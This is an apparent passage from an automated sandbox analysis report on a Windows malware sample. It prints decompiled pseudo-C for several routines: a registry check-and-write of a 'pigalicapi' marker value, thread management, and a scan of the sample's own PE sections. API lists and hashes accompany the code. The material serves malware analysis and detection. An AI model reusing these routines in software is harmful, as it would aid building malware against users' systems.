                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Current$Thread$AtomCreateHandleMutexProcessValue$CloseDuplicateEventFindObjectPriorityReleaseSingleWaitabortfprintffreemallocmemcpystrlen
                                                                                                                                                                                                                                                                                                        • String ID: X%
                                                                                                                                                                                                                                                                                                        • API String ID: 1502871514-765380288
                                                                                                                                                                                                                                                                                                        • Opcode ID: b075b49ea6009e85003a55706380fd09abfb21cbb3150e8bee426d7021328223
                                                                                                                                                                                                                                                                                                        • Instruction ID: 67e3bcb8228b950fd08ff0cec122396874fc9c7fbf7ab65224cae0d0026a9d18
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b075b49ea6009e85003a55706380fd09abfb21cbb3150e8bee426d7021328223
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3B51E8B0A04705DFD720EF69D54835ABBF0BB48304F40892EE99597351D7B8A489CF9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E04005F30() {
                                                                                                                                                                                                                                                                                                        				char* _v8;
                                                                                                                                                                                                                                                                                                        				signed int _v9;
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                                                                                                                        				char _v284;
                                                                                                                                                                                                                                                                                                        				int _v288;
                                                                                                                                                                                                                                                                                                        				int _v292;
                                                                                                                                                                                                                                                                                                        				char _v324;
                                                                                                                                                                                                                                                                                                        				int _v328;
                                                                                                                                                                                                                                                                                                        				char* _t27;
                                                                                                                                                                                                                                                                                                        				CHAR* _t30;
                                                                                                                                                                                                                                                                                                        				long _t37;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v9 = 0;
                                                                                                                                                                                                                                                                                                        				_t27 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                                                        				_v8 = _t27;
                                                                                                                                                                                                                                                                                                        				E04007D20(_t27,  &_v284, 0, 0x104);
                                                                                                                                                                                                                                                                                                        				lstrcpyA( &_v284, "pigalicapi");
                                                                                                                                                                                                                                                                                                        				_t30 =  *0x4011898; // 0x4013fe2
                                                                                                                                                                                                                                                                                                        				lstrcatA( &_v284, _t30);
                                                                                                                                                                                                                                                                                                        				_v16 = 0x80000001;
                                                                                                                                                                                                                                                                                                        				if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        					_v16 = 0x80000002;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                                                                                                                                        				if(RegOpenKeyExA(_v16, _v8, 0, 0xf003f,  &_v20) == 0) {
                                                                                                                                                                                                                                                                                                        					_v292 = 0x20;
                                                                                                                                                                                                                                                                                                        					_v288 = 0x20;
                                                                                                                                                                                                                                                                                                        					_t37 = RegQueryValueExA(_v20,  &_v284, 0, 0,  &_v324,  &_v288); // executed
                                                                                                                                                                                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                                                                                                                                                                                        						_v9 = 1;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_t47 = _v9 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        					if((_v9 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                                        						_v328 = 0x10;
                                                                                                                                                                                                                                                                                                        						E04009BD0(_t47,  &_v324, 0x10);
                                                                                                                                                                                                                                                                                                        						RegSetValueExA(_v20,  &_v284, 0, 3,  &_v324, 0x10); // executed
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					RegCloseKey(_v20); // executed
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v9;
                                                                                                                                                                                                                                                                                                        			}















                                                                                                                                                                                                                                                                                                        0x04005f39
                                                                                                                                                                                                                                                                                                        0x04005f3d
                                                                                                                                                                                                                                                                                                        0x04005f42
                                                                                                                                                                                                                                                                                                        0x04005f53
                                                                                                                                                                                                                                                                                                        0x04005f67
                                                                                                                                                                                                                                                                                                        0x04005f6d
                                                                                                                                                                                                                                                                                                        0x04005f7a
                                                                                                                                                                                                                                                                                                        0x04005f80
                                                                                                                                                                                                                                                                                                        0x04005f90
                                                                                                                                                                                                                                                                                                        0x04005f92
                                                                                                                                                                                                                                                                                                        0x04005f92
                                                                                                                                                                                                                                                                                                        0x04005f99
                                                                                                                                                                                                                                                                                                        0x04005fbb
                                                                                                                                                                                                                                                                                                        0x04005fc1
                                                                                                                                                                                                                                                                                                        0x04005fcb
                                                                                                                                                                                                                                                                                                        0x04005ff2
                                                                                                                                                                                                                                                                                                        0x04005ffa
                                                                                                                                                                                                                                                                                                        0x04005ffc
                                                                                                                                                                                                                                                                                                        0x04005ffc
                                                                                                                                                                                                                                                                                                        0x04006000
                                                                                                                                                                                                                                                                                                        0x04006006
                                                                                                                                                                                                                                                                                                        0x04006008
                                                                                                                                                                                                                                                                                                        0x0400601b
                                                                                                                                                                                                                                                                                                        0x0400603b
                                                                                                                                                                                                                                                                                                        0x0400603b
                                                                                                                                                                                                                                                                                                        0x04006045
                                                                                                                                                                                                                                                                                                        0x04006045
                                                                                                                                                                                                                                                                                                        0x04006051

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(?,pigalicapi), ref: 04005F67
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(?,04013FE2), ref: 04005F7A
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,04003C58,00000000,000F003F,00000000), ref: 04005FB3
                                                                                                                                                                                                                                                                                                        • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 04005FF2
                                                                                                                                                                                                                                                                                                        • RegSetValueExA.KERNEL32(00000000,?,00000000,00000003,?,00000010), ref: 0400603B
                                                                                                                                                                                                                                                                                                        • RegCloseKey.KERNEL32(00000000), ref: 04006045
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Value$CloseOpenQuerylstrcatlstrcpy
                                                                                                                                                                                                                                                                                                        • String ID: $ $pigalicapi
                                                                                                                                                                                                                                                                                                        • API String ID: 764223185-550099112
                                                                                                                                                                                                                                                                                                        • Opcode ID: 423ae5761b421ea40ff2c1466760ba86f39da5aff24a2289ecb93b8c70e41592
                                                                                                                                                                                                                                                                                                        • Instruction ID: d868066335aa3bc34e1d01a835705104c70e08da6b50357c6a08ba3ec109f492
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 423ae5761b421ea40ff2c1466760ba86f39da5aff24a2289ecb93b8c70e41592
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F3143B194021CABEB14CF90DC45FFEB7B8EB08704F048598EB04B6181D7B96A85CF60
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E04004096() {
                                                                                                                                                                                                                                                                                                        				void _t92;
                                                                                                                                                                                                                                                                                                        				void* _t114;
                                                                                                                                                                                                                                                                                                        				void* _t161;
                                                                                                                                                                                                                                                                                                        				void* _t163;
                                                                                                                                                                                                                                                                                                        				void* _t166;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				L0:
                                                                                                                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                                                                                                                        					L0:
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t161 - 0x38)) =  *((intOrPtr*)(_t161 - 0x38)) + 1;
                                                                                                                                                                                                                                                                                                        					if( *((intOrPtr*)(_t161 - 0x38)) >=  *((intOrPtr*)(_t161 + 0x14))) {
                                                                                                                                                                                                                                                                                                        						break;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                                                                                                                        					EnterCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                                                        					if( *(_t161 - 0x30) != 0) {
                                                                                                                                                                                                                                                                                                        						VirtualFree( *(_t161 - 0x30), 0, 0x8000);
                                                                                                                                                                                                                                                                                                        						 *(_t161 - 0x30) = 0;
                                                                                                                                                                                                                                                                                                        						 *(_t161 - 0x2c) = 0;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_t171 =  *(_t161 - 0x34);
                                                                                                                                                                                                                                                                                                        					if( *(_t161 - 0x34) != 0) {
                                                                                                                                                                                                                                                                                                        						TerminateThread( *(_t161 - 0x34), 0);
                                                                                                                                                                                                                                                                                                        						 *(_t161 - 0x34) = 0;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					ResetEvent( *(_t161 - 0x10));
                                                                                                                                                                                                                                                                                                        					LeaveCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                                                        					_t92 = CreateThread(0, 0, E04004AC0, _t161 - 0x34, 0, 0); // executed
                                                                                                                                                                                                                                                                                                        					 *(_t161 - 0x34) = _t92;
                                                                                                                                                                                                                                                                                                        					 *(_t161 - 0x64) = E040097A0( ~(0 | _t171 > 0x00000000) |  *(_t161 + 0x18) * 0x00000004);
                                                                                                                                                                                                                                                                                                        					 *(_t161 - 0x3c) =  *(_t161 - 0x64);
                                                                                                                                                                                                                                                                                                        					E04007D20( *(_t161 - 0x64),  *(_t161 - 0x3c), 0,  *(_t161 + 0x18) << 2);
                                                                                                                                                                                                                                                                                                        					_t166 = _t163 + 0x10;
                                                                                                                                                                                                                                                                                                        					 *(_t161 - 0x60) = 0;
                                                                                                                                                                                                                                                                                                        					L8:
                                                                                                                                                                                                                                                                                                        					while( *(_t161 - 0x60) <  *(_t161 + 0x18)) {
                                                                                                                                                                                                                                                                                                        						( *(_t161 - 0x3c))[ *(_t161 - 0x60)] = 0;
                                                                                                                                                                                                                                                                                                        						E04007D20( *(_t161 - 0x3c), _t161 - 0x58, 0, 0x1c);
                                                                                                                                                                                                                                                                                                        						_t166 = _t166 + 0xc;
                                                                                                                                                                                                                                                                                                        						 *((intOrPtr*)(_t161 - 0x40)) = _t161 - 0x34;
                                                                                                                                                                                                                                                                                                        						 *((intOrPtr*)(_t161 - 0x44)) =  *((intOrPtr*)(_t161 + 0x10));
                                                                                                                                                                                                                                                                                                        						 *(_t161 - 0x58) =  *(_t161 + 8);
                                                                                                                                                                                                                                                                                                        						 *(_t161 - 0x50) =  *(_t161 - 0x60) *  *(_t161 - 8);
                                                                                                                                                                                                                                                                                                        						if( *(_t161 - 0x60) >=  *(_t161 + 0x18) - 1) {
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)(_t161 - 0x4c)) =  *((intOrPtr*)(_t161 + 0xc)) - 1;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)(_t161 - 0x4c)) =  *(_t161 - 0x50) +  *(_t161 - 8) - 1;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						 *(_t161 - 0x48) = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                                                        						_t114 = CreateThread(0, 0,  &M04004BA0, _t161 - 0x58, 0, 0); // executed
                                                                                                                                                                                                                                                                                                        						( *(_t161 - 0x3c))[ *(_t161 - 0x60)] = _t114;
                                                                                                                                                                                                                                                                                                        						WaitForSingleObject( *(_t161 - 0x48), 0xffffffff);
                                                                                                                                                                                                                                                                                                        						FindCloseChangeNotification( *(_t161 - 0x48)); // executed
                                                                                                                                                                                                                                                                                                        						 *(_t161 - 0x60) =  *(_t161 - 0x60) + 1;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					WaitForMultipleObjects( *(_t161 + 0x18),  *(_t161 - 0x3c), 1, 0xffffffff);
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t161 - 0x5c)) = WaitForSingleObject( *(_t161 - 0x10), 0x2710);
                                                                                                                                                                                                                                                                                                        					if( *((intOrPtr*)(_t161 - 0x5c)) == 0) {
                                                                                                                                                                                                                                                                                                        						 *(_t161 - 1) = 1;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t161 - 0x5c)) = WaitForSingleObject( *(_t161 - 0x34), 0x3e8);
                                                                                                                                                                                                                                                                                                        					if( *((intOrPtr*)(_t161 - 0x5c)) != 0) {
                                                                                                                                                                                                                                                                                                        						TerminateThread( *(_t161 - 0x34), 0);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					L17:
                                                                                                                                                                                                                                                                                                        					EnterCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                                                        					if( *(_t161 - 0x30) != 0) {
                                                                                                                                                                                                                                                                                                        						VirtualFree( *(_t161 - 0x30), 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                                        						 *(_t161 - 0x30) = 0;
                                                                                                                                                                                                                                                                                                        						 *(_t161 - 0x2c) = 0;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					L19:
                                                                                                                                                                                                                                                                                                        					LeaveCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                                                        					 *(_t161 - 0x68) =  *(_t161 - 0x3c);
                                                                                                                                                                                                                                                                                                        					E040097C0( *(_t161 - 0x68));
                                                                                                                                                                                                                                                                                                        					if(( *(_t161 - 1) & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                                        						L21:
                                                                                                                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					break;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				L22:
                                                                                                                                                                                                                                                                                                        				DeleteCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                                                        				return  *(_t161 - 1);
                                                                                                                                                                                                                                                                                                        			}








                                                                                                                                                                                                                                                                                                        0x04004096
                                                                                                                                                                                                                                                                                                        0x04004096
                                                                                                                                                                                                                                                                                                        0x04004096
                                                                                                                                                                                                                                                                                                        0x0400409c
                                                                                                                                                                                                                                                                                                        0x040040a5
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x040040ab
                                                                                                                                                                                                                                                                                                        0x040040af
                                                                                                                                                                                                                                                                                                        0x040040b9
                                                                                                                                                                                                                                                                                                        0x040040c6
                                                                                                                                                                                                                                                                                                        0x040040cc
                                                                                                                                                                                                                                                                                                        0x040040d3
                                                                                                                                                                                                                                                                                                        0x040040d3
                                                                                                                                                                                                                                                                                                        0x040040da
                                                                                                                                                                                                                                                                                                        0x040040de
                                                                                                                                                                                                                                                                                                        0x040040e6
                                                                                                                                                                                                                                                                                                        0x040040ec
                                                                                                                                                                                                                                                                                                        0x040040ec
                                                                                                                                                                                                                                                                                                        0x040040f7
                                                                                                                                                                                                                                                                                                        0x04004101
                                                                                                                                                                                                                                                                                                        0x04004118
                                                                                                                                                                                                                                                                                                        0x0400411e
                                                                                                                                                                                                                                                                                                        0x0400413d
                                                                                                                                                                                                                                                                                                        0x04004143
                                                                                                                                                                                                                                                                                                        0x04004153
                                                                                                                                                                                                                                                                                                        0x04004158
                                                                                                                                                                                                                                                                                                        0x0400415b
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0400416d
                                                                                                                                                                                                                                                                                                        0x0400417f
                                                                                                                                                                                                                                                                                                        0x0400418e
                                                                                                                                                                                                                                                                                                        0x04004193
                                                                                                                                                                                                                                                                                                        0x04004199
                                                                                                                                                                                                                                                                                                        0x0400419f
                                                                                                                                                                                                                                                                                                        0x040041a5
                                                                                                                                                                                                                                                                                                        0x040041af
                                                                                                                                                                                                                                                                                                        0x040041bb
                                                                                                                                                                                                                                                                                                        0x040041d2
                                                                                                                                                                                                                                                                                                        0x040041bd
                                                                                                                                                                                                                                                                                                        0x040041c7
                                                                                                                                                                                                                                                                                                        0x040041c7
                                                                                                                                                                                                                                                                                                        0x040041e3
                                                                                                                                                                                                                                                                                                        0x040041f7
                                                                                                                                                                                                                                                                                                        0x04004203
                                                                                                                                                                                                                                                                                                        0x0400420c
                                                                                                                                                                                                                                                                                                        0x04004216
                                                                                                                                                                                                                                                                                                        0x0400416a
                                                                                                                                                                                                                                                                                                        0x0400416a
                                                                                                                                                                                                                                                                                                        0x0400422d
                                                                                                                                                                                                                                                                                                        0x04004242
                                                                                                                                                                                                                                                                                                        0x04004249
                                                                                                                                                                                                                                                                                                        0x0400424b
                                                                                                                                                                                                                                                                                                        0x0400424b
                                                                                                                                                                                                                                                                                                        0x0400425e
                                                                                                                                                                                                                                                                                                        0x04004265
                                                                                                                                                                                                                                                                                                        0x0400426d
                                                                                                                                                                                                                                                                                                        0x0400426d
                                                                                                                                                                                                                                                                                                        0x04004273
                                                                                                                                                                                                                                                                                                        0x04004277
                                                                                                                                                                                                                                                                                                        0x04004281
                                                                                                                                                                                                                                                                                                        0x0400428e
                                                                                                                                                                                                                                                                                                        0x04004294
                                                                                                                                                                                                                                                                                                        0x0400429b
                                                                                                                                                                                                                                                                                                        0x0400429b
                                                                                                                                                                                                                                                                                                        0x040042a2
                                                                                                                                                                                                                                                                                                        0x040042a6
                                                                                                                                                                                                                                                                                                        0x040042af
                                                                                                                                                                                                                                                                                                        0x040042b6
                                                                                                                                                                                                                                                                                                        0x040042c4
                                                                                                                                                                                                                                                                                                        0x040042c8
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x040042c8
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x040042c4
                                                                                                                                                                                                                                                                                                        0x040042cd
                                                                                                                                                                                                                                                                                                        0x040042d1
                                                                                                                                                                                                                                                                                                        0x040042dd

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?), ref: 040040AF
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040040C6
                                                                                                                                                                                                                                                                                                        • TerminateThread.KERNEL32(00000000,00000000), ref: 040040E6
                                                                                                                                                                                                                                                                                                        • ResetEvent.KERNEL32(00000000), ref: 040040F7
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 04004101
                                                                                                                                                                                                                                                                                                        • CreateThread.KERNEL32 ref: 04004118
                                                                                                                                                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 040041DD
                                                                                                                                                                                                                                                                                                        • CreateThread.KERNEL32 ref: 040041F7
                                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0400420C
                                                                                                                                                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(?), ref: 04004216
                                                                                                                                                                                                                                                                                                        • DeleteCriticalSection.KERNEL32(?,?), ref: 040042D1
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CreateCriticalSectionThread$Event$ChangeCloseDeleteEnterFindFreeLeaveNotificationObjectResetSingleTerminateVirtualWait
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 371823443-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 580c7b9ddcd011ba509f7f8c1de4a743a931a1a6ddda21c3e831cc7138ee1551
                                                                                                                                                                                                                                                                                                        • Instruction ID: 702011c11570e1e92260a3d6b56584955ffb64453fe6a6bb8e3d44d087611259
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 580c7b9ddcd011ba509f7f8c1de4a743a931a1a6ddda21c3e831cc7138ee1551
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E51D7B5A40308AFEB18DF94D899BDDBBB1FB48704F108219F605BB2C0D774A940CB54
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E04004510(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                                                                                                                                        				char _v780;
                                                                                                                                                                                                                                                                                                        				void* _v784;
                                                                                                                                                                                                                                                                                                        				char _v1308;
                                                                                                                                                                                                                                                                                                        				long _v1312;
                                                                                                                                                                                                                                                                                                        				void* _v1316;
                                                                                                                                                                                                                                                                                                        				long _v1320;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v1324;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v1328;
                                                                                                                                                                                                                                                                                                        				signed int _v1332;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v1336;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v1340;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v1344;
                                                                                                                                                                                                                                                                                                        				void* _t90;
                                                                                                                                                                                                                                                                                                        				void* _t94;
                                                                                                                                                                                                                                                                                                        				int _t97;
                                                                                                                                                                                                                                                                                                        				signed char _t101;
                                                                                                                                                                                                                                                                                                        				signed char _t114;
                                                                                                                                                                                                                                                                                                        				void* _t153;
                                                                                                                                                                                                                                                                                                        				void* _t155;
                                                                                                                                                                                                                                                                                                        				void* _t156;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                                                        					L24:
                                                                                                                                                                                                                                                                                                        					return _v5;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					E04007D20(E04007D20( &_v780,  &_v780, 0, 0x300),  &_v1308, 0, 0x208);
                                                                                                                                                                                                                                                                                                        					_t155 = _t153 + 0x18;
                                                                                                                                                                                                                                                                                                        					GetModuleFileNameA(0,  &_v1308, 0x208);
                                                                                                                                                                                                                                                                                                        					_t90 = CreateFileA( &_v1308, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                                                                                        					_v784 = _t90;
                                                                                                                                                                                                                                                                                                        					if(_v784 == 0xffffffff) {
                                                                                                                                                                                                                                                                                                        						goto L24;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_v1312 = GetFileSize(_v784, 0);
                                                                                                                                                                                                                                                                                                        					if(_v1312 == 0) {
                                                                                                                                                                                                                                                                                                        						L22:
                                                                                                                                                                                                                                                                                                        						if(_v784 != 0) {
                                                                                                                                                                                                                                                                                                        							CloseHandle(_v784);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						goto L24;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_t94 = VirtualAlloc(0, _v1312, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                                        					_v1316 = _t94;
                                                                                                                                                                                                                                                                                                        					if(_v1316 == 0) {
                                                                                                                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_v1320 = 0;
                                                                                                                                                                                                                                                                                                        					_t97 = ReadFile(_v784, _v1316, _v1312,  &_v1320, 0); // executed
                                                                                                                                                                                                                                                                                                        					if(_t97 == 0 || _v1320 != _v1312) {
                                                                                                                                                                                                                                                                                                        						L20:
                                                                                                                                                                                                                                                                                                        						if(_v1316 != 0) {
                                                                                                                                                                                                                                                                                                        							VirtualFree(_v1316, 0, 0x8000);
                                                                                                                                                                                                                                                                                                        							_v1316 = 0;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						FindCloseChangeNotification(_v784); // executed
                                                                                                                                                                                                                                                                                                        						_v784 = 0;
                                                                                                                                                                                                                                                                                                        						_t101 = E040047F0(_v1316, _v1312, _a8); // executed
                                                                                                                                                                                                                                                                                                        						_t156 = _t155 + 0xc;
                                                                                                                                                                                                                                                                                                        						if((_t101 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                                        							if(_v1316 != 0) {
                                                                                                                                                                                                                                                                                                        								VirtualFree(_v1316, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                                        								_v1316 = 0;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_v1328 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                                                                                                                                                                                                                        							_v1324 = _v1328 + ( *(_v1328 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                                                        							_v1332 = 0;
                                                                                                                                                                                                                                                                                                        							while(_v1332 < ( *(_v1328 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                                                        								_v1336 =  *((intOrPtr*)(_v1324 + 0xc + _v1332 * 0x28)) + _a4;
                                                                                                                                                                                                                                                                                                        								if( *((intOrPtr*)(_v1324 + 8 + _v1332 * 0x28)) <=  *((intOrPtr*)(_v1324 + 0x10 + _v1332 * 0x28))) {
                                                                                                                                                                                                                                                                                                        									_v1344 =  *((intOrPtr*)(_v1324 + 0x10 + _v1332 * 0x28));
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									_v1344 =  *((intOrPtr*)(_v1324 + 8 + _v1332 * 0x28));
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_v1340 = _v1344;
                                                                                                                                                                                                                                                                                                        								_t114 = E040047F0(_v1336, _v1340, _a8); // executed
                                                                                                                                                                                                                                                                                                        								_t156 = _t156 + 0xc;
                                                                                                                                                                                                                                                                                                        								if((_t114 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                                        									_v1332 = _v1332 + 1;
                                                                                                                                                                                                                                                                                                        									continue;
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									_v5 = 1;
                                                                                                                                                                                                                                                                                                        									goto L20;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							goto L20;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_v5 = 1;
                                                                                                                                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}
























                                                                                                                                                                                                                                                                                                        0x0400451a
                                                                                                                                                                                                                                                                                                        0x04004522
                                                                                                                                                                                                                                                                                                        0x040047e6
                                                                                                                                                                                                                                                                                                        0x040047ed
                                                                                                                                                                                                                                                                                                        0x04004532
                                                                                                                                                                                                                                                                                                        0x04004556
                                                                                                                                                                                                                                                                                                        0x0400455b
                                                                                                                                                                                                                                                                                                        0x0400456c
                                                                                                                                                                                                                                                                                                        0x0400458b
                                                                                                                                                                                                                                                                                                        0x04004591
